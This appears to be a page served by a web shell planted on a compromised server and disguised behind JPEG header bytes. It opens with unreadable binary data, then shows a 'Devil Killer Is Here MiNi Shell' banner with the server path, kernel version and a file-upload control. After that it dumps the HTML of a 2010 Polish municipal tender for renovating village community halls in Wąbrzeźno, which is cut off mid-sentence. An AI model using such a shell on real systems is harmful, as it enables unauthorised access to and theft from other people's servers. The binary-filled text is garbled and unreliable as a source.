JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100222/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100222/35679-N-2010.html

<p class="kh_header"><b>Wąbrzeźno: remont budynków świetlic wiejskich wraz z wyposażeniem i zagospodarowaniem terenu w Jaworzu, Przydworzu, Wałyczyku</b><br>
<b>Numer ogłoszenia: 35679 - 2010; data zamieszczenia: 22.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wąbrzeźno , ul. Mickiewicza 21, 87-200 Wąbrzeźno, woj. kujawsko-pomorskie, tel. 056 6871800, faks 056 6881704.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> remont budynków świetlic wiejskich wraz z wyposażeniem i zagospodarowaniem terenu w Jaworzu, Przydworzu, Wałyczyku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest remont 3 budynków świetlic wiejskich wraz z wyposażeniem i zagospodarowaniem terenu we wsiach Jaworze, Przydwórz, Wałyczyk.
Budynek świetlicy wiejskiej w Jaworzu - zakres robót budowlanych obejmuje: 
1) docieplenie stropodachu, w tym: 
- izolacje cieplne i przeciwdźwiękowe z płyt styropianowych laminowanych jednostronnie papą podkładową - 187,00 m2, 
- pokrycie dachów papą termozgrzewalną - 213,00 m2,
- wymiana rynien i rur spustowych,
- wymiana instalacji odgromowej,
- remont kominów,
- obróbki blacharskie,
2) docieplenie ścian zewnętrznych, w tym: 
- wykonanie ręczne cienkowarstwowej wyprawy z tynku mozaikowego - cokół, 
- przyklejanie płyt styropianowych o grubości 8 cm, frezowanych - 154,00 m2,
- wykonanie ręczne cienkowarstwowej wyprawy z tynku mineralnego o fakturze kamyczkowej,
- malowanie elewacji,
- wykonanie opaski wokół budynku
3) prace instalacyjne:
- instalacje elektryczne - gniazd wtyczkowych i instalacji oświetleniowej wraz z montażem opraw oświetleniowych,
- instalacja wodno - kanalizacyjna wraz z armaturą,
4) ściany i okładziny ścienne, w tym:
- wykonanie gładzi szpachlowych - dwuwarstwowe wraz z gruntowaniem podłożą - 429,50 m2,
- dwukrotne malowanie tynków gładkich farbą sylikatową (sufity i ściany) - 429,50 m2,
- licowanie ścian płytkami z kamieni sztucznych wraz z gruntowaniem podłoża - 33m2,
- montaż kratek wentylacyjnych,
5) podłogi i posadzki, w tym:
- mocowanie do istniejących desek podłogowych płyt OSB-3, grubości 22 mm - 91,70 m2,
- posadzki z paneli podłogowych - 91,70 m2,
- podkład betonowy wraz z izolacja przeciwwilgociową i przeciwwodną oraz izolacją cieplną i przeciwdźwiękową pod posadzki płytkowe,
- posadzki płytkowe z kamieni sztucznych - 46,50 m2,
- cokoliki płytkowe z kamieni sztucznych - 51,00 m2,
6) prace zduńskie, w tym:
- przestawienie pieców licowanych kaflami - 7.050 m3,
7) montaż stolarki wewnętrznej z PCV, w tym:
- montaż drzwi z PCV wraz z ościeżnicami - 9 kpl.
8) rusztowania i wywóz gruzu, w tym:    - rusztowania zewnętrzne rurowe - 155,00 m2,
- transport gruzu z terenu rozbiórki - 12,00 m3,
9) zagospodarowanie terenu:
- montaż urządzeń zabawowych: karuzela 4 osobowa - 1 kpl., ważka podwójna - 1 kpl., huśtawka 2 osobowa - 1 kpl., urządzenia stalowe, malowane proszkowo - atestowane, 
Wykonawca zakupi i wyposaży budynek świetlicy wiejskiej w następujące elementy wyposażenia:
1) witryna chłodnicza o szerokości min. 54 cm, wysokości min. 134 cm i głębokości min. 60 cm, kolor biały, wymuszona cyrkulacja powietrza, rozmrażanie automatyczne, półki w środku druciane minimum 5 szt., klasa energetyczna A - 1 szt.;
2) kuchenka wolnostojąca gazowo-elektryczna o szerokości min. 50 cm, wysokości min. 80 cm i głębokości min. 60 cm, kolor biały, piekarnik elektryczny z termoobiegiem, zapalarka w pokrętle, klasa energetyczna A - 1 szt.;
3) stoliki świetlicowe kwadratowe o wymiarach min. 80 cm x 80 cm x 73 cm, blat w kolorze olcha, stelaż metalowy w kolorze czarnym - 20 szt.;
4) krzesła świetlicowe o konstrukcji metalowej (rurka o średnicy min. 32 mm w kolorze czarnym) z drewnianym siedziskiem i oparciem w kolorze olcha - 85 szt.    
Budynek świetlicy wiejskiej w Przydworzu - zakres robót budowlanych obejmuje: 
1) docieplenie stropodachu, w tym: 
- izolacje cieplne i przeciwdźwiękowe z płyt styropianowych laminowanych jednostronnie papą podkładową - 154,00 m2, 
- pokrycie dachów papą termozgrzewalną - 179,00 m2,
- wymiana rynien i rur spustowych,
- wymiana instalacji odgromowej,
- remont kominów,
- obróbki blacharskie,
2) docieplenie ścian zewnętrznych, w tym: 
- wykonanie ręczne cienkowarstwowej wyprawy z tynku mozaikowego (cokół),
- przyklejanie płyt styropianowych o grubości 10 cm, frezowanych  - 173,00 m2,
- wykonanie ręczne cienkowarstwowej wyprawy z tynku mineralnego o fakturze baranek,
- malowanie elewacji,
- wykonanie opaski wokół budynku,
- montaż parapetów zewnętrznych, 
3) prace instalacyjne:
- instalacje elektryczne - gniazd wtyczkowych i instalacji oświetleniowej z montażem opraw oświetleniowych,    
4) ściany i okładziny ścienne, w tym:
- wykonanie gładzi szpachlowych - dwuwarstwowe wraz z gruntowaniem podłożą - 390,00 m2,
- dwukrotne malowanie tynków gładkich farbą sylikatową (sufity i ściany) - 530,00 m2,
- przestawienie 2 pieców licowanych kaflami,
- montaż kratek wentylacyjnych,
5) podłogi i posadzki, w tym:
- podkład betonowy wraz z izolacja przeciwwilgociowa, przeciw wodną oraz izolacją cieplną i przeciwdźwiękową pod posadzki płytkowe,  
- posadzki płytkowe z kamieni sztucznych - 32,00 m2,
- cokoliki płytkowe z kamieni sztucznych - 24,00 m2,
6) montaż stolarki drzwiowej z PCV, w tym:
- montaż drzwi z PCV - 1 kpl.
- montaż drzwi aluminiowych z samo zamykaczem (aluminium ciepłe, szyba P 4) - 2,52 m2,
7) wymiana stolarki okiennej, w tym:
- wymiana okien skrzynkowych na okna z PCV (skrzydła okienne wyposażone w nawiewniki automatyczne higrosterowane) - 29,15 m2,
- montaż parapetów wewnętrznych z PCV,
8) wentylacja,
9) rusztowania i wywóz gruzu, w tym;
- rusztowania zewnętrzne rurowe - 180,00m2,
- transport gruzu z terenu rozbiórki - 10,00 m3,
10)zagospodarowanie terenu, w tym:
- montaż urządzeń zabawowych: karuzela 4 osobowa - 1 kpl., ważka podwójna - 1 kpl., huśtawka 2 osobowa - 1 kpl., urządzenia stalowe, malowane proszkowo - atestowane, 
- ogrodzenie terenu z siatki wysokości do 1,8 m na słupach stalowych - 155,00 m, z wrotami - 1 kpl. i furtką 1 kpl.,
- utwardzenie nawierzchni kostką betonową brukową - 75,00 m2,
- remont zadaszenia nad wejściem do budynku - 13 m2,
Wykonawca zakupi i wyposaży budynek świetlicy wiejskiej w następujące elementy wyposażenia:
1) witryna chłodnicza o szerokości min. 54 cm, wysokości min. 134 cm i głębokości min. 60 cm, kolor biały, wymuszona cyrkulacja powietrza, rozmrażanie automatyczne, półki w środku druciane minimum 5 szt.,  klasa energetyczna A - 1 szt.;
2) kuchenka wolnostojąca gazowo-elektryczna o szerokości min. 50 cm, wysokości min. 80 cm i głębokości min. 60 cm, kolor biały, piekarnik 6-cio funkcyjny - elektryczny z termoobiegiem, zapalarka w pokrętle, klasa energetyczna A - 1 szt.
Budynek świetlicy wiejskiej w Wałyczyku - zakres robót budowlanych obejmuje: 
1) docieplenie stropodachu, w tym: 
- izolacje cieplne i przeciwdźwiękowe z płyt styropianowych laminowanych jednostronnie papą podkładową 
- 122,00 m2, 
- pokrycie dachów papą termozgrzewalną - 122,00 m2,
- wymiana rynien i rur spustowych,
- obróbki blacharskie,
2) docieplenie ściany fundamentowej i cokołu, w tym: 
- docieplenie ścian fundamentowych płytami styropianowymi grubości 6 cm, frezowanymi - 55,50 m2 ,
- izolacje przeciwwilgociowe i przeciw wodne, 
3) docieplenie ścian zewnętrznych, w tym: 
- wykonanie ręczne cienkowarstwowej wyprawy z tynku mozaikowego (cokół),
- wykonanie ręczne cienkowarstwowej wyprawy z tynku mineralnego o fakturze kamyczkowej,
- przyklejanie płyt styropianowych o grubości 10 cm, frezowanych - 134,40 m2,
- malowanie elewacji,
- wykonanie opaski wokół budynku,
- wykonanie zadaszenia nad wejściem do budynku,
- montaż parapetów zewnętrznych,
4) prace instalacyjne, w tym:
- instalacja elektryczna wewnętrzna gniazd wtyczkowych i instalacji oświetleniowej z montażem opraw oświetleniowych,
- instalacja odgromowa,
- instalacja wodno - kanalizacyjna wraz z armaturą,
- montaż zbiornika bezodpływowego o pojemności min. 6 m3 wraz z przyłączem kanalizacji do instalacji wewnętrznej,
5) ściany i okładziny ścienne, w tym:
- wykonanie gładzi szpachlowych - dwuwarstwowe wraz z gruntowaniem podłoża - 338,00 m2,
- dwukrotne malowanie tynków gładkich farbą sylikatową (sufity i ściany) - 255,00 m2,
-  licowanie ścian płytkami z kamieni sztucznych wraz z przygotowaniem podłoża - 83,00 m2,
6) podłogi i posadzki, w tym:
- podkład betonowy wraz z izolacją przeciwwilgociową i przeciwwodną oraz izolacją cieplną i przeciwdźwiękową pod posadzki płytkowe,
- posadzki płytkowe z kamieni sztucznych - 32,0 m2,
- cokoliki płytkowe z kamieni sztucznych - 42,0 m2,
- posadzki z paneli podłogowych - 57,5 m2,
7) montaż stolarki wewnętrznej z PCV, w tym:
- montaż drzwi z PCV wraz z ościeżnicami - 5 kpl.
8) rusztowania i wywóz gruzu, w tym:
- rusztowania zewnętrzne rurowe - 130,00 m2,
- transport gruzu z terenu rozbiórki - 26,00 m3,
9) zagospodarowanie terenu, w tym:
- ogrodzenie terenu z siatki wysokości do 2,0 m na słupkach stalowych - 106,00 m, wraz z furtkami - 2 kpl. i bramą wjazdową - 1 kpl., 
- montaż urządzeń zabawowych: karuzela  4 osobowa - 1 kpl., ważka podwójna - 1 kpl., huśtawka 2 osobowa  - 1 kpl., urządzenia stalowe, malowane proszkowo - atestowane,
- utwardzenie nawierzchni - dojście do budynku - 30,00 m2.
Wykonawca zakupi i wyposaży budynek świetlicy wiejskiej w następujące elementy wyposażenia:
1) witryna chłodnicza o szerokości min. 54 cm, wysokości min. 134 cm i głębokości min. 60 cm, kolor biały, wymuszona cyrkulacja powietrza, rozmrażanie automatyczne, półki w środku druciane minimum 5 szt., klasa energetyczna A - 1 szt.;
2) kuchenka wolnostojąca gazowo-elektryczna o szerokości min. 50 cm, wysokości min. 80 cm i głębokości min. 60 cm, kolor biały, piekarnik 6-cio funkcyjny - elektryczny z termoobiegiem, zapalarka w pokrętle, klasa energetyczna A - 1 szt.;
3) stoliki świetlicowe kwadratowe o wymiarach min. 80 cm x 80 cm x 73 cm, blat w kolorze olcha, stelaż metalowy w kolorze czarnym - 20 szt.;
4) krzesła świetlicowe o konstrukcji metalowej (rurka o średnicy min. 32 mm w kolorze czarnym) z drewnianym siedziskiem i oparciem w kolorze olcha - 85 szt.;
5) meble kuchenne, długość 2 x 6,5 mb (stojące i wiszące), płyta meblowa laminowana w kolorze grusza, blat żaroodporny o grubości min. 30 mm, fronty MDF w kolorze grusza. Zestaw mebli obejmuje także  wbudowany zlewozmywak dwukomorowy w kolorze inox oraz okap kuchenny o szerokości i kolorystyce analogicznej do kuchenki gazowo-elektrycznej - 13 mb.
2.Ponadto wykonawca w ramach przedmiotu zamówienia zobowiązany jest do:       
1) wykonania pomiarów instalacji elektrycznej i odgromowej;
2) wykonania odbiorów kominiarskich;
3) naprawy uszkodzonych urządzeń uzbrojenia podziemnego spowodowanych prowadzonymi robotami;
4) naprawienia uszkodzeń istniejących obiektów i elementów zagospodarowania terenu;   
5) poniesienia kosztów zużytej wody i energii elektrycznej; 
6) uporządkowania i niwelacji terenu po zakończeniu inwestycji;
7) wywiezienia i utylizacji gruzu i materiałów rozbiórkowych.        
3.Szczegółowy opis robót budowlanych i wyposażenia dla każdej ze świetlic zawierają:                                                          
1) dokumentacja projektowa; 
2) specyfikacja techniczna wykonania i odbioru robót budowlanych;
3) przedmiary robót; 
4) wykaz wyposażenia świetlic..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-0, 45.45.30.00-0, 39.15.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten będzie uznany za spełniony przez wykonawcę, jeżeli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 zakończone roboty budowlane polegające na remoncie, budowie, przebudowie budynków użyteczności publicznej, proporcjonalne do przedmiotu zamówienia, a roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Za roboty proporcjonalne do przedmiotu zamówienia zamawiający uważa wykonane roboty o wartości brutto równej i przekraczającej kwotę 500.000,00 zł.
Do wykazu załączyć należy dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone-za wystarczające uznane będzie przedłożenie stosownego potwierdzenia odbiorcy robót;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten będzie uznany za spełniony przez wykonawcę, jeżeli wykonawca dysponuje lub będzie dysponował osobami, które będą odpowiedzialne za kierowanie robotami budowlanymi ( kierownicy robót, brygadziści, majstrowie budowy) i zapewni udział przy realizacji robót kierownika budowy posiadającego uprawnienia budowlane w specjalności ogólnobudowlanej i należącego do Okręgowej Izby Inżynierów Budownictwa,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten będzie uznany za spełniony przez wykonawcę, jeżeli wykonawca jest ubezpieczony od odpowiedzialności cywilnej (odpowiedzialność deliktowa) w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 500.000.00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje wprowadzenie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty złożonej przez wykonawcę, którego oferta została wybrana jako najkorzystniejsza w następujących okolicznościach:
1) jeżeli wystąpią wady w dokumentacji projektowej skutkujące koniecznością dokonania poprawek, zmian lub uzupełnień dokumentacji projektowej a ich konsekwencją będzie zmiana rozwiązań technicznych (technologicznych i materiałowych) wykonania robót lub ich elementu a dokonywanie zmian 
